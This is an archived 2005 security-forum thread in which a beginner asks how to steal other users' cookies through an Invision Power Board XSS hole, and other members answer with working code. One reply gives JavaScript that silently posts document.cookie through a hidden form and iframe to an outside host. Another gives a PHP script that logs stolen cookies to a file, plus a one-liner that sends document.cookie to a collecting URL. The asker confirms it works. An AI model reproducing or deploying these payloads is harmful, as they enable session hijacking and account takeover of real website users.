hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Beginners Section
KarachiKing555
May 4 2005, 02:13 PM
i was just curious how can some get remote users cookies ! this vul shows only your cookie but i want some lil hints how could one get others cookies !! have u setup the php script somewhere else and use some javascript:write functiont so thet it sends the whole data to your site rather then poping it up ??

Invision XSS Vul
ComSec
May 5 2005, 07:09 AM
KarachiKing555... see my reply in the exploit section

regards
nuorder
May 5 2005, 08:35 AM
heres one i made in the early days, its not perfect but something to get you started
QUOTE
document.write('<div style="visibility:hidden;"><iframe src="" name="vvv" width="1" height="1" frameborder="no"></iframe></div>')
document.write('<form name="f1" action="http://www.example.com/addstuff.asp" method="POST" target="vvv">');
document.write('<input type="hidden" name="cookiemonster" value="' + document.cookie + '"/>');
document.write('</form>');
document.forms[0].submit();


I seem to recall that i used this method rather than a straight iframe so it wouldn't show in the history as much.

you will need some form of sql database to store these, using php to email them or write to a file is good too
CereBrums
May 5 2005, 03:37 PM
well,
u can easily direct the cookie to another site,
that will get the information and log it.
as so:
CODE
<?php
$text = $_GET['info'];
$filen = "log.txt";
$fo = fopen($filen, "a");
fputs($fo, "$text\r\n");

fclose($fo);
?>


the cookies will be saved in the file 'log.txt'

the refer is being made using this cmd:
CODE
javascript:document.location("http://site.com/get.php?info=" + document.cookie);


the line
$text = $_GET['info']
gets the data recieved in the var 'info' from the url...

hope u got it .
KarachiKing555
May 6 2005, 06:43 PM
Thx alot Nuorder and Cerebrums ! i got it working now ! wink.gif
d12boy420
Jul 29 2005, 12:13 AM
thanks

BN says:
Bad start! Suspended 14 days for THANKS post.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.